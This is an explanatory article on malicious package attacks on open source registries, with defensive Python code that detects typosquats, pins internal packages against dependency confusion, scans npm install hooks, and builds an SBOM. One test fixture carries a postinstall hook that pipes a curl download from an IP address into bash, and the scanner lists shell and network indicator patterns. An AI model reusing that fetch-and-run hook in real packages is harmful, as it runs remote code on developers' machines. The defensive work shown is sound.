
Uncovering the Tactics and Impact of Malicious Package Attacks on Software Supply Chains


The Growing Threat of Malicious Package Attacks: Tactics and Impact on Cybersecurity

Introduction

Malicious package attacks are not a new threat, but their volume is rising quickly. In a recent report, Mend identified a 315% increase in malicious packages published to popular open source registries from 2021 to 2022, and it expects the trend to continue. A malicious package is malware delivered through a package registry: like other malware, it relies on tricking a person into installing it, but because it arrives through a channel developers already trust (the registry and their build tooling), it is installed with far less scrutiny than a stray executable would be, which is what makes the technique so effective.

The Anatomy of a Malicious Package Attack

Attackers rely on four basic vectors to get a malicious package onto a victim's system: brandjacking, typosquatting, dependency hijacking, and dependency confusion. Once the package is installed, the payload itself is usually simple: pre- and post-install scripts, basic evasion such as obfuscation, shell commands, and basic network communication. More recently, attackers have begun adding more advanced techniques, such as built-in telemetry that reports back details of the victim environment.

Attack Vectors:

  • Brandjacking: The attacker takes over, or convincingly imitates, the identity of a company or package maintainer (a registry account, an organization name, a project's branding) and publishes a package under that trusted name with malicious code inside.
  • Typosquatting: The attacker publishes a malicious package whose name differs from a popular package by a single typo or transposition (for example, a swapped pair of letters) and waits for a developer to misspell the name when adding a dependency, so the malicious package is installed instead.
  • Dependency hijacking: The attacker gains control of an existing package, through a compromised maintainer account, an expired maintainer e-mail domain, or access to its source repository, and publishes a new malicious version that existing users pull in on their next update.
  • Dependency confusion: The attacker publishes a package on a public registry with the same name as an organization's internal package, usually with a much higher version number. A dependency manager configured to consult both the private and the public registry resolves the name to the "newer" public package and installs the attacker's code.

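Two of these vectors can be checked for mechanically. The following is an added example written for this page, not code from the article or from Mend: it flags requested package names that sit one edit away from a well-known name (typosquatting), and it contrasts a resolver that takes the highest version across all registries with one that pins internal names to the private registry (dependency confusion). All package names, version numbers and registry URLs are constructed, and `POPULAR` stands in for a real top-N allowlist.

```python
# Added example (not code from the article): two manifest checks for the
# attack vectors above. Package names, versions and registry URLs are
# constructed; POPULAR stands in for a real top-N allowlist.
from typing import Dict, Iterable, List, Optional, Set, Tuple

POPULAR = {"requests", "lodash", "express", "numpy", "urllib3", "colorama"}


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertions, deletions,
    substitutions and adjacent transpositions each cost 1, so
    'reqeusts' is 1 away from 'requests' just like 'requets' is."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(requested: Iterable[str], max_dist: int = 1) -> List[Tuple[str, str]]:
    """Flag requested names within max_dist edits of a popular name that are
    not themselves popular. Returns (requested, lookalike) pairs."""
    hits = []
    for name in requested:
        lowered = name.lower()
        if lowered in POPULAR:
            continue
        for known in sorted(POPULAR):
            if edit_distance(lowered, known) <= max_dist:
                hits.append((name, known))
                break
    return hits


# Dependency confusion. 'acme-auth' is an internal package that exists only on
# the private registry; an attacker has published a same-named public package
# with a far higher version number.
PRIVATE_REGISTRY = "https://npm.internal.example/"
PUBLIC_REGISTRY = "https://registry.npmjs.org/"
REGISTRIES: Dict[str, Dict[str, List[str]]] = {
    PRIVATE_REGISTRY: {"acme-auth": ["1.2.0", "1.3.0"]},
    PUBLIC_REGISTRY: {"acme-auth": ["99.0.0"], "lodash": ["4.17.21"]},
}


def _version_key(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))


def resolve_naive(name: str) -> Tuple[str, str]:
    """Vulnerable resolution: ask every configured registry and take the
    highest version found anywhere (the behaviour pip shows when a private
    index is added with --extra-index-url). Returns (version, registry)."""
    best: Optional[Tuple[str, str]] = None
    for registry, packages in REGISTRIES.items():
        for version in packages.get(name, []):
            if best is None or _version_key(version) > _version_key(best[0]):
                best = (version, registry)
    if best is None:
        raise LookupError(name)
    return best


def resolve_pinned(name: str, internal_names: Set[str]) -> Tuple[str, str]:
    """Hardened resolution: a name on the internal list is looked up only on
    the private registry, everything else only on the public one (the effect
    of an npm scope line such as '@acme:registry=...' in .npmrc, or of a
    single pip index that proxies both). The public 99.0.0 is never
    considered for 'acme-auth'."""
    registry = PRIVATE_REGISTRY if name in internal_names else PUBLIC_REGISTRY
    versions = REGISTRIES[registry].get(name)
    if not versions:
        raise LookupError(f"{name} not on {registry}")
    return max(versions, key=_version_key), registry
```

Running `typosquat_candidates(["requests", "reqeusts", "lodahs", "expres", "flask"])` flags the three lookalikes and leaves the two genuine names alone; `resolve_naive("acme-auth")` returns the attacker's 99.0.0 from the public registry, while `resolve_pinned("acme-auth", {"acme-auth"})` returns 1.3.0 from the private one. A distance threshold of 1 is deliberately conservative; raising it catches more squats at the cost of more false positives among legitimately similar names.
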
Attack Techniques:

  • Pre- and Post-Install Scripts: Package managers such as npm run lifecycle scripts declared in the package manifest (preinstall, install, postinstall) automatically during installation. Attackers use these hooks to execute their payload the moment the package is installed, with no need for the victim to ever import or call the package.
  • Basic Evasion Techniques: Attackers obfuscate the payload (minification, string encoding such as base64 or hex escapes, eval of assembled strings) so that a quick read of the package source, or a signature-based scanner, does not recognize it.
  • Shell Commands: The install script or package code spawns a shell, which gives the attacker the full privileges of the installing user on the developer workstation or build server: reading files and environment variables, modifying other code, or adding persistence.
  • Basic Network Communication Techniques: The payload opens an outbound connection to attacker infrastructure to exfiltrate collected data (credentials, tokens, environment details) or to download and execute a second-stage payload.

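The install hooks and the indicators above can be checked statically before a package is ever installed. The following is an added example for this page, not code from the article: it reads a package.json, reports which install-time hooks are declared, and labels each hook's command with the techniques it shows signs of (shell execution, network communication, encoded payloads). The two manifests are constructed for the example, and the indicator patterns are illustrative rather than a complete ruleset.

```python
# Added example (not code from the article): a static check for install-time
# hooks and the indicators of the techniques listed above. Both manifests
# below are constructed; the indicator patterns are illustrative, not a
# complete ruleset.
import json
import os
import re
from typing import Dict, List

# npm lifecycle scripts that run automatically when the package is installed
# as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# (label, pattern): shell execution, network communication, evasion/encoding.
INDICATORS = [
    ("shell-exec", re.compile(r"\b(?:sh|bash)\s+-c\b|\bchild_process\b|\bexecSync\b|\|\s*(?:sh|bash)\b")),
    ("network", re.compile(r"\b(?:curl|wget)\b|https?://|\bnet\.connect\b|\bfetch\(")),
    ("encoded-payload", re.compile(r"\bbase64\b|\beval\s*\(|\\x[0-9a-fA-F]{2}|\batob\(")),
]


def scan_manifest(manifest_json: str) -> Dict[str, List[str]]:
    """Return {hook: [indicator labels]} for each install hook present.
    A hook with no indicators still executes code at install time and
    deserves a look; a hook with indicators is the pattern the article
    describes."""
    scripts = json.loads(manifest_json).get("scripts") or {}
    findings: Dict[str, List[str]] = {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        findings[hook] = [label for label, rx in INDICATORS if rx.search(command)]
    return findings


def risk_level(findings: Dict[str, List[str]]) -> str:
    if not findings:
        return "none"
    return "high" if any(findings.values()) else "review"


def scan_tree(root: str) -> Dict[str, Dict[str, List[str]]]:
    """Walk an installed node_modules tree and report every package.json
    that declares an install hook, keyed by path."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        with open(path, encoding="utf-8") as fh:
            try:
                findings = scan_manifest(fh.read())
            except ValueError:  # malformed JSON (JSONDecodeError subclasses it)
                continue
        if findings:
            report[path] = findings
    return report


# Constructed manifests: a harmless one with only test/build scripts, and one
# whose postinstall hook fetches and pipes a remote script into a shell.
BENIGN = json.dumps({
    "name": "left-pad-clone",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
})
MALICIOUS = json.dumps({
    "name": "reqeusts-js",
    "version": "0.0.1",
    "scripts": {
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -s http://198.51.100.7/x | bash')\"",
    },
})
```

`scan_manifest(BENIGN)` returns an empty dict; `scan_manifest(MALICIOUS)` returns `{"postinstall": ["shell-exec", "network"]}`, which `risk_level` rates as high. The complementary runtime control is to install with `npm install --ignore-scripts` (or the equivalent `ignore-scripts=true` in .npmrc) so that hooks never run unreviewed, and then to run `scan_tree("node_modules")` to see which packages would have executed something.
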
The Impact of Malicious Packages on Cybersecurity

Malicious package attacks offer a very high return for the effort expended. Public registries accept uploads from anyone with an account, so a person with basic programming skills can write and publish a malicious package in minutes, and every developer or build system that installs it becomes a victim. This puts renewed urgency on securing the software supply chain: organizations need automated scanning of the open source packages they pull in, and they need an accurate inventory of those packages, a software bill of materials (SBOM), so they can tell quickly whether a newly reported malicious package is present anywhere in their builds.

Preventive Measures:

  • Use automated scanning to monitor the open source packages and registries you depend on for known vulnerabilities and malicious releases, ideally before installation rather than after.
  • Generate a software bill of materials (SBOM) for every build so that any package can be located across the organization as soon as it is reported malicious.
  • Treat the software supply chain as part of the application security program: pin and verify dependency versions, restrict which registries dependency managers may resolve from, and review install-time hooks.
  • Apply fundamental network segmentation with policies governing the movement of data, so that a compromised build machine cannot freely reach production systems or exfiltrate to the internet.
  • Require multifactor authentication for accounts that can publish packages, so that a stolen maintainer password alone is not enough to hijack a dependency.
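
The SBOM and registry-restriction measures above can be combined in one pass over a lockfile. The following is an added example for this page, not code from the article or from any SBOM tool: it builds a minimal CycloneDX document from an npm package-lock.json (lockfileVersion 2 or 3) and, while walking the lock, flags every dependency whose resolved URL is not the registry its name should come from, which is the trace a dependency-confusion install leaves behind. The lockfile contents, the registry hosts and the `@acme` scope mapping are constructed for the example.

```python
# Added example (not code from the article): build a minimal CycloneDX SBOM
# from an npm package-lock.json (lockfileVersion 2 or 3) and, in the same
# pass, flag any dependency whose resolved URL is not the registry its name
# should come from. The lockfile, registry hosts and @acme scope are
# constructed.
import base64
import hashlib
import json
from typing import Dict, List, Tuple
from urllib.parse import quote, urlparse

DEFAULT_REGISTRY_HOST = "registry.npmjs.org"
SCOPE_REGISTRY_HOST = {"@acme": "npm.internal.example"}  # constructed mapping


def expected_host(name: str) -> str:
    scope = name.split("/", 1)[0] if name.startswith("@") else ""
    return SCOPE_REGISTRY_HOST.get(scope, DEFAULT_REGISTRY_HOST)


def name_from_path(path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (nested installs)."""
    return path.rsplit("node_modules/", 1)[1]


def purl(name: str, version: str) -> str:
    """package-url: the '@' of a scoped npm name is percent-encoded."""
    return f"pkg:npm/{quote(name, safe='/')}@{version}"


def cyclonedx_hash(integrity: str) -> Dict[str, str]:
    """npm SRI ('sha512-<base64>') -> CycloneDX hash object (hex content)."""
    algo, _, digest = integrity.split()[0].partition("-")
    return {"alg": algo.upper().replace("SHA", "SHA-"),
            "content": base64.b64decode(digest).hex()}


def build_sbom(lock_json: str) -> Tuple[dict, List[str]]:
    """Return (cyclonedx_document, off_registry_findings)."""
    lock = json.loads(lock_json)
    if lock.get("lockfileVersion", 0) < 2:
        raise ValueError("need lockfileVersion >= 2 (the 'packages' map)")
    root = lock["packages"].get("", {})
    components, off_registry = [], []
    for path, entry in lock["packages"].items():
        if path == "":
            continue
        name = entry.get("name") or name_from_path(path)
        version = entry.get("version", "")
        component = {"type": "library", "name": name, "version": version,
                     "purl": purl(name, version)}
        if "integrity" in entry:
            component["hashes"] = [cyclonedx_hash(entry["integrity"])]
        components.append(component)
        resolved = entry.get("resolved", "")
        if urlparse(resolved).hostname != expected_host(name):
            off_registry.append(f"{name}@{version} <- {resolved or '<no resolved url>'}")
    sbom = {
        "bomFormat": "CycloneDX",
        "specVersion": "1.5",
        "version": 1,
        "metadata": {"component": {"type": "application",
                                   "name": lock.get("name", root.get("name", "")),
                                   "version": root.get("version", "")}},
        "components": components,
    }
    return sbom, off_registry


def _sri(data: bytes) -> str:
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


# Constructed lockfile: lodash and the nested ms come from the public registry
# as expected; the internal @acme/auth was resolved from the public registry
# at an implausible version, exactly what a confused resolver produces.
LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.1.0"},
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
            "integrity": _sri(b"lodash"),
        },
        "node_modules/@acme/auth": {
            "version": "99.0.0",
            "resolved": "https://registry.npmjs.org/@acme/auth/-/auth-99.0.0.tgz",
            "integrity": _sri(b"auth"),
        },
        "node_modules/@acme/auth/node_modules/ms": {
            "version": "2.1.3",
            "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz",
            "integrity": _sri(b"ms"),
        },
    },
})
```

`build_sbom(LOCK)` returns a document with three components whose `purl` values are `pkg:npm/lodash@4.17.21`, `pkg:npm/%40acme/auth@99.0.0` and `pkg:npm/ms@2.1.3`, plus one finding for `@acme/auth`, which should have come from `npm.internal.example`. Storing the SBOM per build is what makes the later question "do we ship package X anywhere?" a lookup instead of a scramble, and the hashes let a build be re-verified against the registry if a package is later suspected of having been replaced.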

Conclusion

Malicious package attacks pose a serious threat to organizational cybersecurity. Most of them are technically unsophisticated, yet they are highly effective, because public registries let anyone publish and because developers and build systems install what they resolve without much scrutiny. As the attacks grow more sophisticated, organizations must increase their efforts to secure the software supply chain: scanning dependencies before they are installed, restricting which registries dependency managers may resolve from, and maintaining an SBOM so that a newly reported malicious package can be found and removed quickly. The impact of these attacks underlines why supply chain security deserves a place at the top of the application security agenda.



Photo by cottonbro studio
